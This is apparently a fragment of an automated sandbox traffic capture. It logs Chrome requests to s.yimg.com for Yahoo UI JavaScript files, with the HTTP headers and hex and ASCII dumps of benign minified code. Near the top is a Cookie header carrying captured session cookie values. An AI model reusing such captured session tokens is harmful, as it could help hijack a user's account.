                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC561INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 530165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Security-Policy: default-src https:; script-src https: 'unsafe-inline'; style-src https: 'unsafe-inline'
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 17:21:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Etag: "36fe94e917e5dc731081ce2ed65a7ca7"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 24 Sep 2024 14:03:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ECAcc (lhd/35B2)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: RNZ/7FqLCqRyKJ7YLupY7mjnblY1NEI+lNworKwpXhwKIxpwuv7QtWzW4rV2B+Is/BKWXkDCGrA=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: MSZAZVXMZ9JB98BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 8487
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC8487INData Raw: 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 69 66 28 6e 29 72 65 74 75 72 6e 20 6e 3b 74 72 79 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 6d 61 74 63 68 28 2f 5b 5c 77 5d 2b 5c 2e 28 5b 5c 77 5d 2b 7c 63 6f 2e 75 6b 29 24 2f 29 5b 30 5d 7d 63 61 74 63 68 28 6e 29 7b 72 65 74 75 72 6e 22 22 7d 7d 3b 63 6f 6e 73 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 22 22 2e 63 6f 6e 63 61 74 28 6e 2c 22 3d 22 29 2c 6f 3d 28 74 7c 7c 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 29 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 61 3d 30 3b 61 3c 6f 2e 6c 65 6e 67 74 68 3b 61 2b 2b 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{"use strict";var n=function(n){if(n)return n;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(n){return""}};const t=function(n,t){for(var e="".concat(n,"="),o=(t||window.document).cookie.split(";"),a=0;a<o.length;a++){va


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    104192.168.2.44986787.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC367OUTGET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC679INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: 03HW5QgqwZO/e8h4/Z81ts3M4YAysNlNm8mOfcc+NK/uz1XufV8Zr0qZ1FKhJiVy23dE1AOu7XU=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 3745HN1308H4NW7V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 02 Sep 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Apr 2022 09:12:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "9ec69a2055c595f415eade096a476b0d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: HE26GDjTNsmXBUPJeKnrarkIBLKe8tee
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 2480098
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: s[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},f=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 28 6b 2b 22 74 6f 67 67 6c 65 2d 63 6c 61 73 73 22 29 7c 7c 22 22 2c 75 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 62 72 6f 77 73 65 72 2d 64 65 66 61 75 6c 74 2d 62 65 68 61 76 69 6f 72 22 29 2c 6c 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 73 63 72 6f 6c 6c 22 29 2c 66 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 73 79 6e 63 2d 64 65 6c 61 79 22 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 74 61 72 67 65 74 22 29 2c 76 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 62 6f 75 6e 64 61 72 79 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: (k+"toggle-class")||"",u=e.getAttribute(k+"toggle-prevent-browser-default-behavior"),l=e.getAttribute(k+"toggle-prevent-scroll"),f=e.getAttribute(k+"sync-delay"),d=e.getAttribute(k+"toggle-target"),v=e.getAttribute(k+"toggle-boundary"),h=e.getAttribute(k+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 26 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 6f 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 65 6c 65 6d 2c 72 3d 65 2e 65 76 65 6e 74 73 3b 69 66 28 30 21 3d 3d 72 2e 73 69 7a 65 29 7b 76 61 72 20 6e 3d 21 30 2c 6f 3d 21 31 2c 69 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 61 2c 73 3d 72 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 61 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 6e 3d 21 30 29 7b 76 61 72 20 75 3d 61 2e 76 61 6c 75 65 2c 6c 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: &r.setAttribute("aria-controls",o)}},{key:"addEventListeners",value:function(){var e=this._util,t=e.elem,r=e.events;if(0!==r.size){var n=!0,o=!1,i=void 0;try{for(var a,s=r.keys()[Symbol.iterator]();!(n=(a=s.next()).done);n=!0){var u=a.value,l=this._state.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 6e 4c 6f 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6f 6e 4c 6f 61 64 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 45 6e 74 65 72 44 65 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 63 6c 69 63 6b 41 6e 64 4d 6f 75 73 65 45 78 69 74 54 69 6d 65 6f 75 74 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: nLoad",value:function(){this.processTargets("onLoad")}},{key:"mouseenter",value:function(){this.processTargets("mouseenter")}},{key:"mouseEnterDelay",value:function(){clearTimeout(this._state.clickAndMouseExitTimeout)}},{key:"mouseleave",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 74 68 69 73 2e 73 77 69 70 65 72 69 67 68 74 28 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 6c 65 66 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 6c 65 66 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 72 69 67 68 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 72 69 67 68 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 72 44 72 61 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 64 72 61 67 3d 7b 65 6e 64 58 3a 30 2c 65 6e 64 59 3a 30 2c 6f 76 65 72 61 6c 6c 44 69 72 65 63 74 69 6f 6e 58 3a 30 2c 73 74 61 72 74 58 3a 30 2c 73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: this.swiperight()}},{key:"swipeleft",value:function(){this.processTargets("swipeleft")}},{key:"swiperight",value:function(){this.processTargets("swiperight")}},{key:"clearDrag",value:function(){this._util.drag={endX:0,endY:0,overallDirectionX:0,startX:0,s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 68 69 73 2e 67 65 74 54 61 72 67 65 74 73 28 66 2c 61 29 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 6e 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 42 6f 6f 6c 65 61 6e 28 63 26 26 75 29 3f 72 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 75 29 7c 7c 72 3a 72 3b 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 3d 74 2e 5f 75 74 69 6c 2e 66 6f 63 75 73 54 61 72 67 65 74 7c 7c 6e 2c 64 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 6f 3d 6c 28 6e 2c 32 29 2c 69 3d 6f 5b 30 5d 2c 75 3d 6f 5b 31 5d 2c 63 3d 72 2e 63 6c 61 73 73 4c 69 73 74 2c 66 3d 69 2e 72 65 70 6c 61 63 65 28 22 57 69 74 68 53 79 6e 63 55 49 44 65 6c 61 79 22 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 22 57
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: his.getTargets(f,a).forEach(function(r){var n=t._util.focusTarget||Boolean(c&&u)?r.querySelector(u)||r:r;t._util.focusTarget=t._util.focusTarget||n,d.forEach(function(n){var o=l(n,2),i=o[0],u=o[1],c=r.classList,f=i.replace("WithSyncUIDelay","").replace("W
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 26 26 28 22 31 22 3d 3d 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 6b 65 79 3f 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 61 64 64 22 3a 72 2e 67 65 74 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 5b 30 5d 5b 30 5d 3d 22 72 65 6d 6f 76 65 22 2c 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 74 61 74 65 43 68 61 6e 67 65 22 29 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 73 74 72 6f 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 64 28 74 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ("stateChange")&&("1"===this._util.key?r.get("stateChange")[0][0]="add":r.get("stateChange")[0][0]="remove",this.processTargets("stateChange"))}},{key:"destroy",value:function(){this.removeEventListeners(),d(t.prototype.__proto__||Object.getPrototypeOf(t.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC733INData Raw: 75 29 7d 29 2c 75 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 2c 75 7d 72 65 74 75 72 6e 20 75 28 74 2c 65 29 2c 53 28 74 2c 5b 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 50 28 64 6f 63 75 6d 65 6e 74 2c 22 6b 65 79 64 6f 77 6e 22 2c 74 68 69 73 2e 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 29 7d 7d 2c 7b 6b 65 79 3a 22 5f 68 61 6e 64 6c 65 4b 65 79 44 6f 77 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 3d 65 7c 7c 77 69 6e 64 6f 77 2e 65 76 65 6e 74 2c 65 2e 6b 65 79 43 6f 64 65 29 7b 63 61 73 65 20 32 37 3a 76 61 72 20 74 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e 65 6c 65 6d 65 6e 74 49 6e 73 74 61 6e 63 65 73 2c 72 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: u)}),u.addEventListeners(),u}return u(t,e),S(t,[{key:"addEventListeners",value:function(){P(document,"keydown",this._handleKeyDown)}},{key:"_handleKeyDown",value:function(e){switch(e=e||window.event,e.keyCode){case 27:var t=this._state.elementInstances,r=


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    105192.168.2.44986687.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC416OUTGET /aaq/fp/js/react-wafer-featurebar.custom.modern.12732500bc8e47693f0d777bbe88001c.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC710INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: VhQb0ahu+Lh3ICAs6fLliJUtnR1lPCq6Zdb4iLT1OzLYriSAA7lIdmQPU1bFUEBPzH0x6PLpzMkhDlqANw2orbqze9OR7Nym5ELXVj9MHPc=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 4GTEG54NDYQ79ZQK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 09 Sep 2024 06:30:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Thu, 04 Aug 2022 04:32:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "12732500bc8e47693f0d777bbe88001c"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: ktIqZY5t35wTM4d07XFqB.S0kDb7QpBg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 1853453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:01 UTC1300INData Raw: 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 22 66 65 61 74 75 72 65 62 61 72 49 64 22 2c 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 72 65 61 63 74 2d 77 61 66 65 72 2d 46 65 61 74 75 72 65 62 61 72 22 29 5b 30 5d 3b 69 66 28 65 29 7b 69 66 28 65 2e 63 6c 61 73 73 4c 69 73 74 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 26 26 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 61 75 74 6f 2d 63 6c 6f 73 65 22 29 29 7b 76 61 72 20 61 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 66 65 61 74 75 72 65 62 61 72 2d 63 6f 6e 74 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: window.addEventListener("load",(function(){var t="featurebarId",e=document.getElementsByClassName("react-wafer-Featurebar")[0];if(e){if(e.classList&&e.classList.contains&&e.classList.contains("auto-close")){var a=e.getElementsByClassName("featurebar-conte
